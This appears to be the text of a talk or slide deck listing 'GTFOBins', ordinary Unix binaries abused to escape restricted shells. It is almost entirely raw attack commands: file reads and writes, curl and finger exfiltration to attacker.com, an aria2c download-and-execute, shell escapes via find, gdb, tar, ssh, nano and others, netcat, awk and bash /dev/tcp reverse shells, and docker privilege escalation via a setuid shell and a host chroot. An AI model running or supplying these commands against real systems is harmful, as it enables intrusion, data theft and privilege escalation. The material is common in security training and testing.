Lightning DTalks by DareCode
Get the f**k Out binaries
List of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
Restricted shells are conceptually shells with restricted permissions, with features and commands working under a very peculiar environment, built to keep users in a secure and controlled environment, allowing them just the minimum necessary to perform their daily operations.
Linux administrators generally need to provide a local or remote shell to other users, or administrators, for daily routine management and support procedures, that’s why it is extremely important to restrict these shell’s features to a minimum necessary for this activities, but sometimes it’s just not enough to keep it away from hackers, as you will soon see.
awk '//' "file_to_read"
awk -v LFILE=file_to_write \ 'BEGIN { print "DATA" > LFILE }'
base64 "file_to_read" | base64 --decode
curl file://path/to/file/to/read
curl http://attacker.com/file_to_get -o file
curl -X POST -d @file_to_send \ http://attacker.com/post_data_handler
date -f file_to_read
date: invalid date '<entry>' date: invalid date ' <id>tag:drupal,comment-41</id>' date: invalid date ' <published>2006-06-27T18:14:18+02:00</published>'
...
diff --line-format=%L /dev/null file_to_read
finger x@REMOTE_HOST | base64 -d > "dest_file"
finger "$(base64 file_to_send)@REMOTE_HOST
Thugh life!
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
aria2c --on-download-error=$TF http://x
aria2c --allow-overwrite \ --gid=aaaaaaaaaaaaaaaa \ --on-download-complete=bash \ http://attacker.com/aaaaaaaaaaaaaaaa
Pass gid parameter to on-download-complete command, so bash aaaaaaaaaaaaaaaa is run (run your script!)
crontab -e
awk 'BEGIN {system("/bin/sh")}'
find . -exec /bin/sh \; -quit
ftp
!/bin/sh
gdb -nx -ex '!sh' -ex quit
!sh
TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF
mail -f $TF
!/bin/sh
make --eval=$'x:\n\t-'"/bin/sh"
node -e 'require("child_process").spawn(
"/bin/sh",
{stdio: [0, 1, 2]});'
python -c 'import os; os.system("/bin/sh")'
CMD="/bin/sh" php -r 'system(getenv("CMD"));'
mysql -e '\! /bin/sh'
sqlite3 /dev/null '.shell /bin/sh'
tar -cf /dev/null /dev/null \
--checkpoint=1 \
--checkpoint-action=exec=/bin/sh
/usr/bin/time /bin/sh
rsync -e 'sh -c "sh 0<&2 1>&2"' \ 127.0.0.1:/dev/null
ssh -o ProxyCommand=';sh 0<&2 1>&2' x
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
scp -S $TF x y:
rpm --eval '%{lua:posix.exec("/bin/sh")}' rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
zip temp.zip /etc/hosts -T -TT 'sh #'
TF=$(mktemp) echo 'exec sh' > $TF chmod +x $TF nano -s $TF /etc/hosts ^T
nano -s "sh -c sh" /etc/hosts
nc -e /bin/sh REMOTE_HOST REMOTE_POR
nc -l -p 12345 -e /bin/sh
RHOST=attacker.com
RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
export RHOST=attacker.com export RPORT=12345 bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
Why?
An attacker could launch symlink to SetUID script, and between steps 1 and 3, change symlink.
sudo docker run --rm \ -v /home/$USER:/h_docs ubuntu \ sh -c 'cp /bin/sh /h_docs/ \ && chmod +s /h_docs/sh' \ && ~/sh -p
sudo docker run --rm -ti -v /:/mnt \
-v /proc:/mnt/proc \
-v /sys:/mnt/sys \
alpine chroot /mnt
?